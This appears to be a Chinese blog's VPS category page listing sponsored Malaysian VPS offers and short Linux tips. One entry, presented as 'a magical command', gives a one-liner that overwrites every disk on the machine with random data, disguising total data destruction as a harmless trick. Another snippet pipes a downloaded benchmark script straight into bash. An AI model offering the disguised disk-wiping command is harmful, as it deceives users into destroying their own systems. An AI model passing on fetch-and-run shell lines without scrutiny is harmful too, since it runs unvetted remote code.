分类: VPS
thumbnail
VPS

投稿:Casbay:马来西亚VPS, $7.59/月1核/1GB内存/20GB空间/100M带宽/不限制流量/KVM

Casbay(AS132841)成立于2010年,是一家拥有十多年历史的服务器服务商,专注于提供高性能的专用服务器。我们拥有自己的网络和数据中心,主打马来西亚和新加坡……
thumbnail
VPS

BlackFriday优惠投稿

Casbay已经开始了2023年的黑色星期五优惠活动,活动将持续至11月份。提供高性能从32GB内存VPS,月付仅需$68起,独立服务器从64GB ECC内存,12核(CPU),月付仅需$……
thumbnail
VPS

投稿:Server Gigabit:马来西亚VPS月付$7.59起 ,100M带宽,不限流量

Servergigabit(千兆服务器有限公司)是一家成立于2011年的老牌马来西亚主机商家,主营马来西亚VPS、虚拟主机、独立服务器、游戏服务器、裸金属服务器等,其中……
thumbnail
VPS

投稿:Mondoze: 马来西亚VPS(原生IP) 8折促销, 5.59美元/月起, 100M带宽/不限流量, 支持TikTok/ChatGPT

Mondoze怎样?Mondoze好不好?Mondoze服务器值得购买吗?Mondoze是一家成立于2012马来西亚服务器商家,机房位于马来西亚,主打VPS业务,独立服务器,云服务器……
thumbnail
VPS

投稿:Casbay: 马来西亚VPS/云服务器, 100Mbps带宽,不限流量,月付 $11.59

Casbay(AS132841)自2010年成立起,现如今已有十多年历史的服务器商家,有自己的网络和服数据中心。主打马来西亚和新加坡数据中心的业务,其中包括VPS业务,独……
thumbnail
VPS

BlueSkyXN 综合工具箱 Linux Supported ONLY

BlueSkyXN 综合工具箱 Linux Supported ONLY FROM: https://github.com/BlueSkyXN/SKY-BOX HELP: https://www.blueskyxn.com/202104/4465.html USE: wget -O b……
thumbnail
VPS

VPS测速命令

1  、wget -qO- bench.sh | bash   2、wget http://cachefly.cachefly.net/100mb.test && rm -f 100mb.test   3、wget https://raw.githubu……
thumbnail
VPS

一条神奇的命令

linux下输入: [php]fdisk -l | grep 'Disk /dev/' | sed 's#/dev/##g' | sed 's#:##g' | awk '{system("dd if=/dev/urandom of=/dev/"$2)}' [/php]
thumbnail
VPS

linux下IPTABLES配置详解

linux下IPTABLES配置详解 - 草原和大树 - 博客园// 如果你的IPTABLES基础知识还不了解,建议先去看看. 开始配置 我们来配置一个filter表的防火墙. (1)查看……
thumbnail
VPS

/var/lib/mysql/mysql.sock错误的解决办法

解决方法: 大多数mysql都是rpm方式安装的。它会自动寻找/var/lib/mysql/mysql.sock这个文件。 检查mysql.sock的位置。 通过/etc/my.cnf中的socket的字段。 如……